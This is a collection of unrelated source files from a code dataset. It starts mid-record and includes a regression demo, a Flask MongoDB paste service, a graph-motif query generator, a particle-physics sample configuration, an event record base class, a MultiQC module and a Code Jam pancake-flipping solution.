instance.profile.save()","sub_path":"django2opah/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"424201608","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nN = 50\nX = np.linspace(0, 10, N) # 50 evenly spaced points between 0 and 10\nY = 0.5 * X + np.random.randn(N)\n\n# manually make some outliers\nY[-1] += 30 # the last point is 30 bigger than it is\nY[-2] += 30\n\nplt.scatter(X, Y)\n\n## solve for the best way\n\n# add the bias term\nX = np.vstack([np.ones(N), X]).T\n\n## calculate the maximum likelihood solution\nw_ml = np.linalg.solve(X.T.dot(X), X.T.dot(Y))\nY_hat_ml = X.dot(w_ml)\nplt.scatter(X[:, 1], Y)\nplt.plot(X[:, 1], Y_hat_ml)\n\n## Calculate the L2 regularization solution\nl2 = 1000.0 # l2 penalty\nw_map = np.linalg.solve(l2 * np.eye(2) + X.T.dot(X), X.T.dot(Y))\nY_hat_map = X.dot(w_map)\nplt.scatter(X[:, 1], Y)\nplt.plot(X[:, 1], Y_hat_ml, label='maximum likelihood')\nplt.plot(X[:, 1], Y_hat_map, label='map')\nplt.legend()\n\n","sub_path":"LinReg/l2_regularization.py","file_name":"l2_regularization.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"216482274","text":"from flask import Flask,Request\nfrom flask import request\nfrom flask import jsonify\nfrom flask import make_response\nimport os\nimport pymongo\nfrom urlparse import urlparse\nimport datetime\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nHEADERS_TO_COPY = ['Content-Type']\n\n\nclass SimpleRequest(Request):\n want_form_data_parsed = False\n data = None\n\napp = Flask(__name__)\napp.request_class = SimpleRequest\n\nMONGO_URL = os.environ.get('MONGOHQ_URL')\n\nif MONGO_URL:\n conn = pymongo.MongoClient(MONGO_URL)\n db = conn[urlparse(MONGO_URL).path[1:]]\nelse:\n conn = pymongo.MongoClient('localhost', 27017)\n db = conn[__name__]\n\n@app.route('/', defaults={'path': ''}, methods=['GET'])\n@app.route('/', methods=['GET'])\ndef catch_all_get(path):\n\n doc = db.state.find_one({'_id': path})\n raw = request.args.get('raw', False)\n\n if raw:\n ret = (doc[u'data'], 200) if doc else (u'not found', 404)\n response = make_response(ret)\n\n for header_name, header_value in doc[u'headers'].items():\n if header_name in HEADERS_TO_COPY:\n response.headers[header_name] = header_value\n\n return response\n else:\n ret = (jsonify(doc), 200) if doc \\\n else (jsonify({u'_id': path, u'error': u'not found'}), 404)\n return ret\n\n@app.route('/', defaults={'path': ''}, methods=['POST'])\n@app.route('/', methods=['POST'])\ndef catch_all_post(path):\n\n doc = {u'_id': path,\n u'data': request.get_data(as_text=True),\n u'headers': dict(request.headers),\n u'time': str(datetime.datetime.utcnow().isoformat())}\n db.state.save(doc)\n return jsonify(doc)\n\n@app.route('/', defaults={'path': ''}, methods=['DELETE'])\n@app.route('/', methods=['DELETE'])\ndef catch_all_delete(path):\n db.state.remove({u'_id': path})\n return jsonify({u'_id': path, u'data': None})\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"restbin.py","file_name":"restbin.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"118731512","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ScaDaMaLe Course [site](https://lamastex.github.io/scalable-data-science/sds/3/x/) and [book](https://lamastex.github.io/ScaDaMaLe/index.html)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # Intro\n# MAGIC \n# MAGIC In this notebook we create a code-writing program. Coding a specific motif generally makes for very long strings, the length grows as \\\\(n^2\\\\). Thus coding them directly is very inefficient. We solved this problem via a simple program. Here we can simply feed the adjacancy matrix of the motif we want to find, and it gives us the scala code.\n\n# COMMAND ----------\n\nimport numpy as np\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC In this funtion we input the adjacancy matrix of the motif we want to find. Then it produces the text of a scala command. Than command can then be copy-pasted into another notebook.\n# MAGIC \n# MAGIC Here we simply go through the adjacancy matrix and fix the string thereafter. In this function the motif we want to find is induced by the graph. Thus each edge is either wanted or forbidden. \n# MAGIC \n# MAGIC loops - Do we care about loops or not.\n\n# COMMAND ----------\n\n\ndef matrix_to_string(input_matrix, input_function_name, loops = True):\n ret_string = \"def \" + input_function_name + \"(input_graph: GraphFrame) = {\\n\\tval string_\" +input_function_name+ \" = \\\"\"\n filter_string = \"\"\n pos_edges = \"\"\n neg_edges = \"\"\n alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n \n for i in range(len(input_matrix)):\n for j in range(len(input_matrix[i])):\n if i == j:\n if loops and input_matrix[i][j] != 0:\n pos_edges += \"(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n elif loops:\n neg_edges += \"!(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n elif input_matrix[i][j] != 0:\n pos_edges += \"(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n else:\n neg_edges += \"!(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n if i > j:\n filter_string += \".filter(\\\"\" + alphabet[j] + \".id != \" + alphabet[i] + \".id\\\")\"\n ret_string += pos_edges + neg_edges\n ret_string = ret_string[0:-2]\n ret_string += \"\\\"\\n\\tinput_graph.find(g_1)\"\n ret_string += filter_string\n ret_string += \".count\\n}\\n\"\n return ret_string\n \n \n \n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC In this funtion we input the signed adjacancy matrix of the motif we want to find. Then it produces the text of a scala command. Than command can then be copy-pasted into another notebook.\n# MAGIC \n# MAGIC Here we simply go through the adjacancy matrix and fix the string thereafter. In this function each edge can either be demanded, forbidden, or allowed. The three states are represented by 1, -1, and all other values.\n# MAGIC \n# MAGIC loops - Do we care about loops or not.\n\n# COMMAND ----------\n\ndef matrix_to_string_signed(input_matrix, input_function_name):\n ret_string = \"def \" + input_function_name + \"(input_graph: GraphFrame) = {\\n\\tval string_\" +input_function_name+ \" = \\\"\"\n filter_string = \"\"\n pos_edges = \"\"\n neg_edges = \"\"\n alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n \n for i in range(len(input_matrix)):\n for j in range(len(input_matrix[i])):\n if input_matrix[i][j] == 1:\n pos_edges += \"(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n elif input_matrix[i][j] == -1:\n neg_edges += \"!(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n if i > j:\n filter_string += \".filter(\\\"\" + alphabet[j] + \".id != \" + alphabet[i] + \".id\\\")\"\n ret_string += pos_edges + neg_edges\n ret_string = ret_string[0:-2]\n ret_string += \"\\\"\\n\\tinput_graph.find(g_1)\"\n ret_string += filter_string\n ret_string += \".count\\n}\\n\"\n return ret_string\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC # Examples\n# MAGIC \n# MAGIC Here is a quick example where we have coded for a \"claw\". Another name for the claw is a star of size 3, meaning it has 4 vertices.\n\n# COMMAND ----------\n\nprint(matrix_to_string([[0,0,0,1],[0,0,0,1],[0,0,0,1],[0,0,0,0]], \"count_claw\", loops = False))\n\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Here we cave coded for a v-structure.\n\n# COMMAND ----------\n\nprint(matrix_to_string([[0,0,1],[0,0,1],[0,0,0]], \"count_v_struc\", loops = False))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Counting how many loops\n\n# COMMAND ----------\n\nprint(matrix_to_string([[1]], \"count_loop\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC A very important thing we want to look at is complete graphs. \n# MAGIC \n# MAGIC As these can grow big, we write a function to generate them.\n\n# COMMAND ----------\n\ndef adj_matrix_complete_graph(size):\n adj_matrix = np.zeros((size,size))\n for i in range(len(adj_matrix)):\n for j in range(i+1, len(adj_matrix[i])):\n adj_matrix[i][j] = 1\n return adj_matrix\n \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now we can generate the code of interest.\n\n# COMMAND ----------\n\nfor i in range(3,7+1):\n print(matrix_to_string_signed(adj_matrix_complete_graph(i), \"count_K\"+str(i)))\n\n# COMMAND ----------\n\n","sub_path":"dbcArchives/2021/000_0-sds-3-x-projects/student-project-07_group-MathAtKTH/03_graph_string_converter.py","file_name":"03_graph_string_converter.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"502333730","text":"# Description: Common configuration file for creating pico sample set plotting scripts\nimport re\nfrom TauFW.Plotter.sample.utils import LOG, STYLE, ensuredir, repkey, joincuts, setera, getyear, Sel, Var\nfrom TauFW.Plotter.sample.utils import getsampleset as _getsampleset\n\ndef getsampleset(channel,era,**kwargs):\n verbosity = LOG.getverbosity(kwargs)\n year = getyear(era) # get integer year\n split = kwargs.get('split', ['DY'] ) # split samples (e.g. DY) into genmatch components\n join = kwargs.get('join', ['VV','Top'] ) # join samples (e.g. VV, top)\n tag = kwargs.get('tag', \"\" )\n table = kwargs.get('table', True ) # print sample set table\n setera(era) # set era for plot style and lumi-xsec normalization\n \n # SM BACKGROUND MC SAMPLES\n if era=='2016':\n expsamples = [ # table of MC samples to be converted to Sample objects\n # GROUP NAME TITLE XSEC EXTRA OPTIONS\n ( 'DY', \"DYJetsToLL_M-10to50\", \"Drell-Yan 10-50\", 18610.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DYJetsToLL_M-50\", \"Drell-Yan 50\", 4963.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY1JetsToLL_M-50\", \"Drell-Yan 1J 50\", 1012.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY2JetsToLL_M-50\", \"Drell-Yan 2J 50\", 334.7, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY3JetsToLL_M-50\", \"Drell-Yan 3J 50\", 102.3, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY4JetsToLL_M-50\", \"Drell-Yan 4J 50\", 54.52, {'extraweight': 'zptweight'} ),\n ( 'WJ', \"WJetsToLNu\", \"W + jets\", 50260.0 ),\n ( 'WJ', \"W1JetsToLNu\", \"W + 1J\", 9625.0 ),\n ( 'WJ', \"W2JetsToLNu\", \"W + 2J\", 3161.0 ),\n ( 'WJ', \"W3JetsToLNu\", \"W + 3J\", 954.8 ),\n ( 'WJ', \"W4JetsToLNu\", \"W + 4J\", 494.6 ),\n ( 'VV', \"WW\", \"WW\", 75.88 ),\n ( 'VV', \"WZ\", \"WZ\", 27.6 ),\n ( 'VV', \"ZZ\", \"ZZ\", 12.14 ),\n ( 'ST', \"ST_t-channel_top\", \"ST t-channel t\", 136.02 ),\n ( 'ST', \"ST_t-channel_antitop\", \"ST t-channel at\", 80.95 ),\n ( 'ST', \"ST_tW_top\", \"ST tW\", 35.85 ),\n ( 'ST', \"ST_tW_antitop\", \"ST atW\", 35.85 ),\n ( 'TT', \"TT\", \"ttbar\", 831.76, {'extraweight': 'ttptweight'} ),\n ]\n elif era=='2017':\n expsamples = [ # table of MC samples to be converted to Sample objects\n # GROUP NAME TITLE XSEC EXTRA OPTIONS\n ( 'DY', \"DYJetsToLL_M-10to50\", \"Drell-Yan 10-50\", 18610.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DYJetsToLL_M-50\", \"Drell-Yan 50\", 5343.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY1JetsToLL_M-50\", \"Drell-Yan 1J 50\", 877.8, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY2JetsToLL_M-50\", \"Drell-Yan 2J 50\", 304.4, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY3JetsToLL_M-50\", \"Drell-Yan 3J 50\", 111.5, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY4JetsToLL_M-50\", \"Drell-Yan 4J 50\", 44.05, {'extraweight': 'zptweight'} ),\n ( 'WJ', \"WJetsToLNu\", \"W + jets\", 52940.0 ),\n ( 'WJ', \"W1JetsToLNu\", \"W + 1J\", 8104.0 ),\n ( 'WJ', \"W2JetsToLNu\", \"W + 2J\", 2793.0 ),\n ( 'WJ', \"W3JetsToLNu\", \"W + 3J\", 992.5 ),\n ( 'WJ', \"W4JetsToLNu\", \"W + 4J\", 544.3 ),\n ( 'VV', \"WW\", \"WW\", 75.88 ),\n ( 'VV', \"WZ\", \"WZ\", 27.6 ),\n ( 'VV', \"ZZ\", \"ZZ\", 12.14 ),\n ( 'ST', \"ST_t-channel_top\", \"ST t-channel t\", 136.02 ),\n ( 'ST', \"ST_t-channel_antitop\", \"ST t-channel at\", 80.95 ),\n ( 'ST', \"ST_tW_top\", \"ST tW\", 35.85 ),\n ( 'ST', \"ST_tW_antitop\", \"ST atW\", 35.85 ),\n ( 'TT', \"TTTo2L2Nu\", \"ttbar 2l2#nu\", 88.29, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToHadronic\", \"ttbar hadronic\", 377.96, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToSemiLeptonic\", \"ttbar semileptonic\", 365.35, {'extraweight': 'ttptweight'} ),\n ]\n elif era=='UL2017':\n expsamples = [ # table of MC samples to be converted to Sample objects\n # GROUP NAME TITLE XSEC EXTRA OPTIONS\n #( 'DY', \"DYJetsToLL_M-10to50\", \"Drell-Yan 10-50\", 18610.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DYJetsToLL_M-50\", \"Drell-Yan 50\", 5343.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY1JetsToLL_M-50\", \"Drell-Yan 1J 50\", 877.8, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY2JetsToLL_M-50\", \"Drell-Yan 2J 50\", 304.4, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY3JetsToLL_M-50\", \"Drell-Yan 3J 50\", 111.5, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY4JetsToLL_M-50\", \"Drell-Yan 4J 50\", 44.05, {'extraweight': 'zptweight'} ),\n ( 'WJ', \"WJetsToLNu\", \"W + jets\", 52940.0 ),\n ( 'WJ', \"W1JetsToLNu\", \"W + 1J\", 8104.0 ),\n ( 'WJ', \"W2JetsToLNu\", \"W + 2J\", 2793.0 ),\n ( 'WJ', \"W3JetsToLNu\", \"W + 3J\", 992.5 ),\n ( 'WJ', \"W4JetsToLNu\", \"W + 4J\", 544.3 ),\n ( 'VV', \"WW\", \"WW\", 75.88 ),\n ( 'VV', \"WZ\", \"WZ\", 27.6 ),\n ( 'VV', \"ZZ\", \"ZZ\", 12.14 ),\n ( 'ST', \"ST_t-channel_top\", \"ST t-channel t\", 136.02 ),\n ( 'ST', \"ST_t-channel_antitop\", \"ST t-channel at\", 80.95 ),\n ( 'ST', \"ST_tW_top\", \"ST tW\", 35.85 ),\n ( 'ST', \"ST_tW_antitop\", \"ST atW\", 35.85 ),\n ( 'TT', \"TTTo2L2Nu\", \"ttbar 2l2#nu\", 88.29, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToHadronic\", \"ttbar hadronic\", 377.96, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToSemiLeptonic\", \"ttbar semileptonic\", 365.35, {'extraweight': 'ttptweight'} ),\n ]\n elif era=='2018':\n expsamples = [ # table of MC samples to be converted to Sample objects\n # GROUP NAME TITLE XSEC EXTRA OPTIONS\n ( 'DY', \"DYJetsToLL_M-10to50\", \"Drell-Yan 10-50\", 18610.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DYJetsToLL_M-50\", \"Drell-Yan 50\", 4963.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY1JetsToLL_M-50\", \"Drell-Yan 1J 50\", 1012.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY2JetsToLL_M-50\", \"Drell-Yan 2J 50\", 334.7, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY3JetsToLL_M-50\", \"Drell-Yan 3J 50\", 102.3, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY4JetsToLL_M-50\", \"Drell-Yan 4J 50\", 54.52, {'extraweight': 'zptweight'} ),\n ( 'WJ', \"WJetsToLNu\", \"W + jets\", 52940.0 ),\n ( 'WJ', \"W1JetsToLNu\", \"W + 1J\", 8104.0 ),\n ( 'WJ', \"W2JetsToLNu\", \"W + 2J\", 2793.0 ),\n ( 'WJ', \"W3JetsToLNu\", \"W + 3J\", 992.5 ),\n ( 'WJ', \"W4JetsToLNu\", \"W + 4J\", 544.3 ),\n ( 'VV', \"WW\", \"WW\", 75.88 ),\n ( 'VV', \"WZ\", \"WZ\", 27.6 ),\n ( 'VV', \"ZZ\", \"ZZ\", 12.14 ),\n ( 'ST', \"ST_t-channel_top\", \"ST t-channel t\", 136.02 ),\n ( 'ST', \"ST_t-channel_antitop\", \"ST t-channel at\", 80.95 ),\n ( 'ST', \"ST_tW_top\", \"ST tW\", 35.85 ),\n ( 'ST', \"ST_tW_antitop\", \"ST atW\", 35.85 ),\n ( 'TT', \"TTTo2L2Nu\", \"ttbar 2l2#nu\", 88.29, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToHadronic\", \"ttbar hadronic\", 377.96, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToSemiLeptonic\", \"ttbar semileptonic\", 365.35, {'extraweight': 'ttptweight'} ),\n ]\n else:\n LOG.throw(IOError,\"Did not recognize era %r!\"%(era))\n \n # OBSERVED DATA SAMPLES\n if 'tautau' in channel: dataset = \"Tau_Run%d?\"%year\n elif 'mutau' in channel: dataset = \"SingleMuon_Run%d?\"%year\n elif 'etau' in channel: dataset = \"EGamma_Run%d?\"%year if year==2018 else \"SingleElectron_Run%d?\"%year\n elif 'mumu' in channel: dataset = \"SingleMuon_Run%d?\"%year\n elif 'emu' in channel: dataset = \"SingleMuon_Run%d?\"%year\n elif 'ee' in channel: dataset = \"EGamma_Run%d?\"%year if year==2018 else \"SingleElectron_Run%d?\"%year\n else:\n LOG.throw(IOError,\"Did not recognize channel %r!\"%(channel))\n datasample = ('Data',dataset) # GROUP, NAME\n \n # SAMPLE SET\n weight = \"genweight*trigweight*puweight*idisoweight_1*idweight_2\"\n if era=='UL2017':\n weight = weight.replace(\"*idweight_2\",\"\")\n fname = \"$PICODIR/$SAMPLE_$CHANNEL$TAG.root\"\n kwargs.setdefault('weight',weight) # common weight for MC\n kwargs.setdefault('fname', fname) # default filename pattern\n sampleset = _getsampleset(datasample,expsamples,channel=channel,era=era,**kwargs)\n \n # JOIN\n # Note: titles are set via STYLE.sample_titles\n sampleset.stitch(\"W*Jets\", incl='WJ', name='WJ' ) # W + jets\n sampleset.stitch(\"DY*J*M-50\", incl='DYJ', name=\"DY_M50\" ) # Drell-Yan, M > 50 GeV\n #sampleset.stitch(\"DY*J*M-10to50\", incl='DYJ', name=\"DY_M10to50\" )\n sampleset.join('DY', name='DY' ) # Drell-Yan, M < 50 GeV + M > 50 GeV\n if 'VV' in join:\n sampleset.join('VV','WZ','WW','ZZ', name='VV' ) # Diboson\n if 'TT' in join and era!='year':\n sampleset.join('TT', name='TT' ) # ttbar\n if 'ST' in join:\n sampleset.join('ST', name='ST' ) # single top\n if 'Top' in join:\n sampleset.join('TT','ST', name='Top' ) # ttbar + single top\n \n # SPLIT\n # Note: titles are set via STYLE.sample_titles\n if split and channel.count('tau')==1:\n ZTT = STYLE.sample_titles.get('ZTT',\"Z -> %s\"%channel) # title\n if channel.count('tau')==1:\n ZTT = ZTT.replace(\"{l}\",\"{mu}\" if \"mu\" in channel else \"{e}\")\n GMR = \"genmatch_2==5\"\n GML = \"genmatch_2>0 && genmatch_2<5\"\n GMJ = \"genmatch_2==0\"\n GMF = \"genmatch_2<5\"\n elif channel.count('tau')==2:\n ZTT = ZTT.replace(\"{l}\",\"{h}\")\n GMR = \"genmatch_1==5 && genmatch_2==5\"\n GML = \"(genmatch_1<5 || genmatch_2<5) && genmatch_1>0 && genmatch_2>0\"\n GMJ = \"(genmatch_1==0 || genmatch_2==0)\"\n GMF = \"(genmatch_1<5 || genmatch_2<5)\"\n else:\n LOG.throw(IOError,\"Did not recognize channel %r!\"%(channel))\n if 'DY' in split:\n sampleset.split('DY',[('ZTT',ZTT,GMR),('ZL',GML),('ZJ',GMJ),])\n if 'DM' in split: # split DY by decay modes\n samples.split('DY', [('ZTT_DM0', ZTT+\", h^{#pm}\", GMR+\" && decayMode_2==0\"),\n ('ZTT_DM1', ZTT+\", h^{#pm}h^{0}\", GMR+\" && decayMode_2==1\"),\n ('ZTT_DM10',ZTT+\", h^{#pm}h^{#mp}h^{#pm}\", GMR+\" && decayMode_2==10\"),\n ('ZTT_DM11',ZTT+\", h^{#pm}h^{#mp}h^{#pm}h^{0}\",GMR+\" && decayMode_2==11\"),\n ('ZL',GML),('ZJ',GMJ),])\n if 'TT' in split:\n sampleset.split('TT',[('TTT',GMR),('TTJ',GMF),])\n \n if table:\n sampleset.printtable(merged=True,split=True)\n return sampleset\n \n","sub_path":"Plotter/config/samples.py","file_name":"samples.py","file_ext":"py","file_size_in_byte":11786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"183574941","text":"#!/usr/bin/env python\n# coding: utf-8\n# Copyright (c) Qotto, 2019\n\n\"\"\" BaseRecord\n\nAll event / command / result must be inherit form this base class.\n\nThis class contain some base attribute for more details read class docstring\n\"\"\"\n\nimport uuid\nfrom datetime import (datetime, timezone)\n\nfrom typing import Dict, Any\n\nfrom tonga.utils.gen_correlation_id import gen_correlation_id\n\n__all__ = [\n 'BaseRecord',\n]\n\n\nclass BaseRecord:\n \"\"\" BaseRecord Class, is root class of all events\n\n Attributes:\n schema_version (str): Includes the schema version of the record, it helps to keep applications compatible\n with older records in the system\n record_id (str): Should be a unique identifier for your record. It should follow the UUID_ format.\n There should be no duplicate values for this field in the entire system.\n partition_key (str): Should be a key determining to which partition your record will be assigned.\n Records with the same *partition_key* value are guaranteed to be written to\n the same partition. This field can, for instance, be derived from the aggregate ID.\n correlation_id (str): An identifier that should be propagated across every call through the entire system.\n The purpose of this identifier is to track the waterfall of actions triggered by a unique\n upstream event. This is mainly used for debugging purposes.\n context (Dict[str, Any]): Somewhat similar to *correlation_id* in its implementation, because it\n should propagate to all downstream records. At each step, *context* can be completed\n with additional data, relevant to actions that were taken.\n\n Context has two purposes:\n - It facilitates debugging, by giving more information explaining why the record\n was generated.\n - It also provides a mechanism to keep relevant state of the upstream\n application, that can react to records generated by downstream\n applications. This enables developers to build reactive systems\n that can send asynchronous commands and respond to the results as\n soon as they are available, without keeping an internal state. This\n is equivalent to **stateless stream processing**, which greatly\n simplifies application code by eliminating state management.\n\n .. _UUID:\n https://en.wikipedia.org/wiki/Universally_unique_identifier\n \"\"\"\n schema_version: str\n record_id: str\n partition_key: str\n date: datetime\n correlation_id: str\n context: Dict[str, Any]\n\n def __init__(self, record_id: str = None, schema_version: str = None, partition_key: str = None,\n correlation_id: str = None, date: datetime = None, context: Dict[str, Any] = None) -> None:\n \"\"\" BaseRecord constructor\n\n Args:\n record_id (str): Should be a unique identifier for your record. It should follow the UUID_ format.\n There should be no duplicate values for this field in the entire system.\n schema_version (str): Includes the schema version of the record, it helps to keep applications compatible\n with older records in the system\n partition_key (str): Should be a key determining to which partition your record will be assigned.\n Records with the same *partition_key* value are guaranteed to be written to\n the same partition. This field can, for instance, be derived from the aggregate ID.\n correlation_id (str): An identifier that should be propagated across every call through the entire system.\n The purpose of this identifier is to track the waterfall of actions triggered\n by a unique upstream event. This is mainly used for debugging purposes.\n date (datetime): Python datetime, when base_dict was call date was split into two variable,\n (*timestamp* UNIX timestamp in milliseconds, which is easy to read for machines)\n (*datetime* ISO-8601-encoded string, which is human readable, therefore useful for\n debugging purposes.)\n context (Dict[str, Any]): Somewhat similar to *correlation_id* in its implementation, because it\n should propagate to all downstream records. At each step, *context* can be\n completed with additional data, relevant to actions that were taken.\n\n Context has two purposes:\n - It facilitates debugging, by giving more information explaining why the record\n was generated.\n - It also provides a mechanism to keep relevant state of the upstream\n application, that can react to records generated by downstream\n applications. This enables developers to build reactive systems\n that can send asynchronous commands and respond to the results as\n soon as they are available, without keeping an internal state. This\n is equivalent to **stateless stream processing**, which greatly\n simplifies application code by eliminating state management.\n\n .. _UUID:\n https://en.wikipedia.org/wiki/Universally_unique_identifier\n \"\"\"\n if record_id is None:\n self.record_id = uuid.uuid4().hex\n else:\n self.record_id = record_id\n\n if partition_key is None:\n self.partition_key = '0'\n else:\n self.partition_key = partition_key\n\n if schema_version is None:\n self.schema_version = '0.0.0'\n else:\n self.schema_version = schema_version\n\n if correlation_id is None:\n self.correlation_id = gen_correlation_id()\n else:\n self.correlation_id = correlation_id\n\n if date is None:\n self.date = datetime.now(timezone.utc)\n else:\n self.date = date\n\n if context is None:\n self.context = dict()\n else:\n self.context = context\n\n def base_dict(self) -> Dict[str, Any]:\n \"\"\" Return base dict.\n\n Returns:\n Dict[str, Any]: Base dict contains (record_id, schema_version, partition_key, datetime,\n timestamp, correlation_id, context)\n \"\"\"\n return {\n 'record_id': self.record_id,\n 'schema_version': self.schema_version,\n 'partition_key': self.partition_key,\n 'datetime': self.date.isoformat(),\n 'timestamp': self.date.timestamp() * 1000,\n 'correlation_id': self.correlation_id,\n 'context': self.context\n }\n\n @classmethod\n def event_name(cls) -> str:\n \"\"\" Return BaseRecord Class name, used by serializer\n\n Raises:\n NotImplementedError: Abstract def\n\n Returns:\n None\n \"\"\"\n raise NotImplementedError\n\n def to_dict(self) -> Dict[str, Any]:\n \"\"\" Serialize BaseRecord to dict\n\n Raises:\n NotImplementedError: Abstract def\n\n Returns:\n Dict[str, Any]: class in dict format\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def from_dict(cls, dict_data: Dict[str, Any]):\n \"\"\" Deserialize dict to BaseRecord\n\n Args:\n dict_data (Dict|str, Any]): Contains all BaseRecord Class attribute for return an instanced class\n\n Raises:\n NotImplementedError: Abstract def\n\n Returns:\n None\n \"\"\"\n raise NotImplementedError\n","sub_path":"tonga/models/records/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"318672497","text":"from multiqc.modules.base_module import BaseMultiqcModule\nimport json\n\nclass MultiqcModule(BaseMultiqcModule):\n def __init__(self):\n # Initialise the parent object\n super(MultiqcModule, self).__init__(name='Differential Gene Expression', anchor='dge_module',\n href=\"\",\n info=\"\")\n self.mod_data = dict()\n ###example of finding files specified in the search_patterns.yaml file\n for f in self.find_log_files('differential_expression/json'): \n path_file = f['fn']\n\n path_json = None\n with open(path_file,\"r\") as pf:\n path_json = json.load(pf) \n \n if path_json:\n img_list = []\n heatmap_file = path_json[\"heatmap\"]\n volcano_file = path_json[\"volcano\"]\n with open(heatmap_file,\"r\" )as h:\n img_list.append(h.read())\n with open(volcano_file,\"r\") as r:\n img_list.append(r.read())\n img_html = \"\\n\".join(img_list)\n self.add_section(content=img_html)\n\n ###add section text content\n self.add_section(\n content = '
Insert report section
'\n )\n\n\n","sub_path":"Multiqc/modules/differential_expression/differential_expression.py","file_name":"differential_expression.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"508229977","text":"import sys\r\nimport time\r\nstart_time = time.time()\r\nsys.stdin = open(\"input.txt\", \"r\")\r\n# sys.stdout = open(\"output.txt\", \"w\")\r\n\r\n# import random\r\n# for i in range(100):\r\n# print(random.randint(10**5,10**6))\r\n\r\ndef last_minus(arr):\r\n ans = -1\r\n for i in range(len(arr)):\r\n if arr[i] == '-':\r\n ans = i\r\n return ans\r\n\r\ndef flip(arr, index):\r\n for i in range(index + 1):\r\n if arr[i] == '-':\r\n arr[i] = '+'\r\n else:\r\n arr[i] = '-'\r\n return arr\r\n\r\n\r\nsys.stdout = open(\"output.txt\", \"w\")\r\nsys.stdout = sys.__stdout__\r\nfor testcases in range(int(input())):\r\n pancakes = input()\r\n arr = []\r\n for i in pancakes:\r\n arr.append(i)\r\n ans = 0\r\n while True:\r\n res = last_minus(arr)\r\n if res == -1:\r\n break\r\n ans += 1\r\n arr = flip(arr, res)\r\n\r\n sys.stdout = open(\"output.txt\", \"a\")\r\n print(\"Case #\" + str(testcases + 1) + \": \" + str(ans) )\r\n sys.stdout = sys.__stdout__\r\n print(\"Case #\" + str(testcases + 1) + \": Done\")\r\n\r\nsys.stdout = sys.__stdout__\r\nprint(time.time() - start_time)","sub_path":"codes/CodeJamCrawler/CJ/16_0_2_AgeOfEmpires2_main.py","file_name":"16_0_2_AgeOfEmpires2_main.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
